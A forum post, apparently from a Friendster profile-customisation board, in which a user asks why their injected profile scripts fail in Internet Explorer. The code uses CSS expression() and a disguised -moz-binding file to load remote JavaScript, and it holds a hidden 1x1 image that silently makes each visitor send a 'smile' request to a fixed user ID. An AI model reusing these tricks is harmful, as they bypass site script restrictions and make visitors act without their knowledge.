Re: if u r ie lover and dont mind bout firefox u can just simply
insert ur complete compile js url here ( [b]js plus css[/b])
[quote]body { width:expression( function load(){ get=document.createElemen
How come mine doesn't work on IE I mean none of the js tricks appear even after a couple of refresh but it works on Firefox although I have to press F5 once to see the js tricks. Here are my js codes :
//Status
status=content_12.innerHTML
secStat=status.search("seconds")
minStat=status.search("minutes")
if((secStat<0)||(minStat<0)){
document.getElementById('content_12').innerHTML="<img src='http://img237.imageshack.us/img237/2269/pizza1xz7.jpg' border='0'>"
}
else{
document.getElementById('content_12').innerHTML="<img src='http://img237.imageshack.us/img237/70/mmmhmm1un2.jpg' border='0'>"
}
//WVM Smilies
var smyler = document.getElementById("8");
var wvmsmyle="<div id='commonbox wvmsmyle' style='visibility:hidden;height:0px;'><img src='http://www.friendster.com/sendmessage.php?uid="+63583869+"&action=sendsmile&_submitted=1' width='1' height= '1' /></div>";
var smyl = document.createElement("li");
smyl.innerHTML=wvmsmyle;
smyler.parentNode.insertBefore(smyl,smyler);
//Moving friends
function moving() {
var marqueeFriends = document.getElementById('content_2').innerHTML;
var liwzdar = document.getElementById('content_2');
liwzdar.innerHTML ="<marquee id=\"marquee\" direction=\"down\" height=\"300\" scrollamount=\"2\" onMouseOver=\"stop()\" onMouseOut=\"start()\">"+marqueeFriends+"<marquee>";
}
setTimeout("moving()",5000);
My jsloader.swf:
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="thecradle">
<implementation>
<constructor><![CDATA[document.write('<script src=http://boxstr.com/files/2495493_8ctnn/JS_CSSFILE.txt></script>')]]></constructor>
</implementation>
</binding>
</bindings>
My linker.css which I pasted on top of my external css codes:
body {
-moz-binding:url("http://boxstr.com/files/2492034_sjwlu/rss.swf#thecradle");
width:expression(
function load(){
get=document.createElement("script");
get.type="text/javascript";
get.src="view-source:http://boxstr.com/files/2495493_8ctnn/JS_CSSFILE.txt";
document.getElementsByTagName("head")[0].appendChild(get);}
window.onload=load);
}